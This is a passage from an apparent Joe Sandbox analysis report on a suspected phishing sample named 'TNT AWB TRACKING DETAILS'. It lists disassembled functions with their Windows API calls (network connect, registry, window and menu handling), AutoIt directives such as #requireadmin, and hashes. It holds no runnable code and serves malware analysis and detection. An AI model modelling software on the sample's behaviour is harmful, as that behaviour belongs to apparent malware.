                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 2726a4c91df93d57c273a951b5e82758a29910cbe0860df7e2d7f8dd24d20e05
                                                    • Instruction ID: 4f58c7564507b8e16d55401d118faf0412d265e55c33fb46ca1414a84dad60ea
                                                    • Opcode Fuzzy Hash: 2726a4c91df93d57c273a951b5e82758a29910cbe0860df7e2d7f8dd24d20e05
                                                    • Instruction Fuzzy Hash: 41314F75D00109BFDB14DF94DC89EFFBBBCEF19350F000169E905A2141DB745E89AAA0
                                                    Function 00F462CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F462EC
                                                    • GetWindowLongW.USER32(01855758,000000F0), ref: 00F4631F
                                                    • GetWindowLongW.USER32(01855758,000000F0), ref: 00F46354
                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F46386
                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F463B0
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F463C1
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F463DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: 94cb64a371e83bb20bdf050038b888a0a395bbd3732fa02b0ae0962f997fe203
                                                    • Instruction ID: ec2e56acfac48f1032b6878dd32450da6f6386c1dddaf6f6325955136a3eec66
                                                    • Opcode Fuzzy Hash: 94cb64a371e83bb20bdf050038b888a0a395bbd3732fa02b0ae0962f997fe203
                                                    • Instruction Fuzzy Hash: BF31E335A441949FEB20CF18DC84F653BE1BB5A724F190165F905DB2B2CB71A844AB52
                                                    Function 00F1DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F1DB2E
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F1DB54
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F1DB57
                                                    • SysAllocString.OLEAUT32(?), ref: 00F1DB75
                                                    • SysFreeString.OLEAUT32(?), ref: 00F1DB7E
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F1DBA3
                                                    • SysAllocString.OLEAUT32(?), ref: 00F1DBB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 9398d00c575396a1f525c9984eac6306884c86b5a77a9c718c9a53040a32c7f2
                                                    • Instruction ID: f5d357029e6c813e63fdd903588549fc818b21c692605fb64c52a21dd8a6f83a
                                                    • Opcode Fuzzy Hash: 9398d00c575396a1f525c9984eac6306884c86b5a77a9c718c9a53040a32c7f2
                                                    • Instruction Fuzzy Hash: F5218B76A05219AF9B10DFA9DC88CEB73ACEB49360B018125FD19DB260DA709C85A760
                                                    Function 00F36173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F37D8B: inet_addr.WSOCK32(00000000), ref: 00F37DB6
                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00F361C6
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F361D5
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F3620E
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00F36217
                                                    • WSAGetLastError.WSOCK32 ref: 00F36221
                                                    • closesocket.WSOCK32(00000000), ref: 00F3624A
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F36263
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: 8c3f06a9cbd16a2e5b2db6e5a906e587621758652ad26905684afaed29f2c978
                                                    • Instruction ID: 3d02f4947e1b41dceac7e71462ab1158f69829fe169e6350c7bcbed51997d22a
                                                    • Opcode Fuzzy Hash: 8c3f06a9cbd16a2e5b2db6e5a906e587621758652ad26905684afaed29f2c978
                                                    • Instruction Fuzzy Hash: 1731A475600118AFDF10AF24CC85FBE7BA9EB45734F058029FD05E7292CB74AC44AB61
                                                    Function 00F1F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: a94a6eb5d193318fd889496044db997ac4b28cde00cc87a3208dbb86de66a086
                                                    • Instruction ID: 9cd3c0a11ca7fd45c47b9257aa3f1f635b1bf755109cff3363fc30775c021bf6
                                                    • Opcode Fuzzy Hash: a94a6eb5d193318fd889496044db997ac4b28cde00cc87a3208dbb86de66a086
                                                    • Instruction Fuzzy Hash: B721797260465166D320AA35AC03FE773D8EF5A320F24403AF946D71A1EB519DCAE395
                                                    Function 00F1DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F1DC09
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F1DC2F
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F1DC32
                                                    • SysAllocString.OLEAUT32 ref: 00F1DC53
                                                    • SysFreeString.OLEAUT32 ref: 00F1DC5C
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F1DC76
                                                    • SysAllocString.OLEAUT32(?), ref: 00F1DC84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: a24635116c2bad74330b334f0425c3734ff9ef2f85f23ef8ebbf7cccd392de59
                                                    • Instruction ID: 99b545bd73a0e44fd91e8f21089215cc99255b3c7f5be05769950349de47c490
                                                    • Opcode Fuzzy Hash: a24635116c2bad74330b334f0425c3734ff9ef2f85f23ef8ebbf7cccd392de59
                                                    • Instruction Fuzzy Hash: 33217436604208AFDB10DFA9DC88DAB77ECEB19370B108525FD15CB260DAB0DC85E7A4
                                                    Function 00F475CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EC1D73
                                                      • Part of subcall function 00EC1D35: GetStockObject.GDI32(00000011), ref: 00EC1D87
                                                      • Part of subcall function 00EC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC1D91
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F47632
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F4763F
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F4764A
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F47659
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F47665
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 5d88a1fa68c57c637f5d2ab4862e7fa1d52ef724914d32f3573a67d968979709
                                                    • Instruction ID: 8d7bcabb13f54b574841bf7650ba69cc5368d081f5bc97bb8eeebcbcdcdd6c41
                                                    • Opcode Fuzzy Hash: 5d88a1fa68c57c637f5d2ab4862e7fa1d52ef724914d32f3573a67d968979709
                                                    • Instruction Fuzzy Hash: 3411B6B211021DBFEF119F64CC85EE77F6DEF08798F014115BA08A2060CB729C21EBA4
                                                    Function 00EE9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __init_pointers.LIBCMT ref: 00EE9AE6
                                                      • Part of subcall function 00EE3187: EncodePointer.KERNEL32(00000000), ref: 00EE318A
                                                      • Part of subcall function 00EE3187: __initp_misc_winsig.LIBCMT ref: 00EE31A5
                                                      • Part of subcall function 00EE3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EE9EA0
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EE9EB4
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EE9EC7
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EE9EDA
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EE9EED
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EE9F00
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00EE9F13
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EE9F26
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EE9F39
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EE9F4C
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EE9F5F
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EE9F72
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EE9F85
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EE9F98
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EE9FAB
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EE9FBE
                                                    • __mtinitlocks.LIBCMT ref: 00EE9AEB
                                                    • __mtterm.LIBCMT ref: 00EE9AF4
                                                      • Part of subcall function 00EE9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00EE9AF9,00EE7CD0,00F7A0B8,00000014), ref: 00EE9C56
                                                      • Part of subcall function 00EE9B5C: _free.LIBCMT ref: 00EE9C5D
                                                      • Part of subcall function 00EE9B5C: DeleteCriticalSection.KERNEL32(00F7EC00,?,?,00EE9AF9,00EE7CD0,00F7A0B8,00000014), ref: 00EE9C7F
                                                    • __calloc_crt.LIBCMT ref: 00EE9B19
                                                    • __initptd.LIBCMT ref: 00EE9B3B
                                                    • GetCurrentThreadId.KERNEL32 ref: 00EE9B42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                    • String ID:
                                                    • API String ID: 3567560977-0
                                                    • Opcode ID: ce2f005d9ec0201339ffebaae22d62d9edc02eff20a096de8c6eb4b28cf6be6c
                                                    • Instruction ID: e388c6d857b5a801470f2b1c584a1925bf04976864dd375c2c9916a162ef36fd
                                                    • Opcode Fuzzy Hash: ce2f005d9ec0201339ffebaae22d62d9edc02eff20a096de8c6eb4b28cf6be6c
                                                    • Instruction Fuzzy Hash: FAF0963251979D59E77477777C0764A36D19F02738F20262AF558F51D3EF2084414164
                                                    Function 00EE406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EE3F85), ref: 00EE4085
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00EE408C
                                                    • EncodePointer.KERNEL32(00000000), ref: 00EE4097
                                                    • DecodePointer.KERNEL32(00EE3F85), ref: 00EE40B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 6c1a4b9ce1662de40ead0f9701883b1646e7cbb5f431afec2abdfad3a1900cfa
                                                    • Instruction ID: 54aa45136f84d130829a0f6cb450c525b8b074b1f64f46bd100f2235d9bea6ac
                                                    • Opcode Fuzzy Hash: 6c1a4b9ce1662de40ead0f9701883b1646e7cbb5f431afec2abdfad3a1900cfa
                                                    • Instruction Fuzzy Hash: F5E0BF74941708DFEB509F61EC0DB653AA4B716F46F104125F905E11F0CBB68608FB15
                                                    Function 00F264B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: 5012a48467faa442fc0b7f55185493ef327567d69c1ea96b7cda04f3a9f232bc
                                                    • Instruction ID: 0233601dc8d1ac24594fb41736ff4bab3ef7345ac539e7e0e2ea20f3877d29aa
                                                    • Opcode Fuzzy Hash: 5012a48467faa442fc0b7f55185493ef327567d69c1ea96b7cda04f3a9f232bc
                                                    • Instruction Fuzzy Hash: 6261AD3190026A9BCF05EF60CD86FFE3BA5AF04318F044528F855AB292DB75EC46DB50
                                                    Function 00F401E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F3FDAD,?,?), ref: 00F40E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F402BD
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F402FD
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F40320
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F40349
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F4038C
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F40399
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: 18113cfd154707d6ac26c987e415cceb9ea81d37fc4e5c826c6dbb1ef5c3f281
                                                    • Instruction ID: a0f34869991a9c8dd689b120a56f7a2ea1b251b13e4ac6a33290fb859b08a6b9
                                                    • Opcode Fuzzy Hash: 18113cfd154707d6ac26c987e415cceb9ea81d37fc4e5c826c6dbb1ef5c3f281
                                                    • Instruction Fuzzy Hash: 49518831608304AFC700EF64C985E6EBBE9FF85314F04492DF995972A2DB32E945EB52
                                                    Function 00F45799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 00F457FB
                                                    • GetMenuItemCount.USER32(00000000), ref: 00F45832
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F4585A
                                                    • GetMenuItemID.USER32(?,?), ref: 00F458C9
                                                    • GetSubMenu.USER32(?,?), ref: 00F458D7
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F45928
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 00b99cbbaaabe13e08247d6ec4c65794798d033d3e2e3c000771d845ac01baf1
                                                    • Instruction ID: 2e8d0fda8ee11329a11d4837fb42f879685088d86854991e1b5797cc0c70a22d
                                                    • Opcode Fuzzy Hash: 00b99cbbaaabe13e08247d6ec4c65794798d033d3e2e3c000771d845ac01baf1
                                                    • Instruction Fuzzy Hash: A4514B36E00619AFCF15EF64C845AAEBBB4EF48720F104069EC05BB352DB75AE419B90
                                                    Function 00F1EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F1EF06
                                                    • VariantClear.OLEAUT32(00000013), ref: 00F1EF78
                                                    • VariantClear.OLEAUT32(00000000), ref: 00F1EFD3
                                                    • _memmove.LIBCMT ref: 00F1EFFD
                                                    • VariantClear.OLEAUT32(?), ref: 00F1F04A
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F1F078
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 66cd33411b9e8a5924380109eadfa056e18220c01fbb8302e9e4d58841b9110c
                                                    • Instruction ID: b9e57de81ad0d8b658d034a2d56426add327f3175338914c4557a57a18b6fc40
                                                    • Opcode Fuzzy Hash: 66cd33411b9e8a5924380109eadfa056e18220c01fbb8302e9e4d58841b9110c
                                                    • Instruction Fuzzy Hash: 375166B5A00209EFDB10CF58C880AAAB7F8FF4C314B15856AED49DB315E731E955CBA0
                                                    Function 00F2220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22258
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F222A3
                                                    • IsMenu.USER32(00000000), ref: 00F222C3
                                                    • CreatePopupMenu.USER32 ref: 00F222F7
                                                    • GetMenuItemCount.USER32(000000FF), ref: 00F22355
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F22386
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
